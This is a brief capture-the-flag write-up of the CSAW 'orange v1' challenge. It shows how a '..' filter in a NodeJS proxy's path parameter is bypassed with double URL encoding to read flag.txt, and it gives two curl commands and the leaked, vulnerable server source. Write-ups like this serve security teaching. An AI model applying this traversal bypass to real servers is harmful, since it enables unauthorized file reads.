orange v1
I wrote a little proxy program in NodeJS for my poems folder.
Everyone wants to read flag.txt but I like it too much to share.
http://web.chal.csaw.io:7311/?path=orange.txt
We don’t have much here, its just a GET parameter, after a bunch of tries we realized that “..” characters are banned, so lets try with double encoding:
1 | $ curl 'http://web.chal.csaw.io:7311/?path=%252e%252e/' |
And there it is the flag!
1 | $ curl 'http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt' |
Since we could leak the source code here ill post it:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30var http = require('http');
var fs = require('fs');
var url = require('url');
var server = http.createServer(function(req, res) {
try {
var path = url.parse(req.url, true).query;
path = path['path'];
if (path.indexOf("..") == -1 && path.indexOf("NN") == -1) {
var base = "http://localhost:8080/poems/";
var callback = function(response){
var str = '';
response.on('data', function (chunk) {
str += chunk;
});
response.on('end', function () {
res.end(str);
});
}
http.get(base + path, callback).end();
} else {
res.writeHead(403);
res.end("WHOA THATS BANNED!!!!");
}
}
catch (e) {
res.writeHead(404);
res.end('Oops');
}
});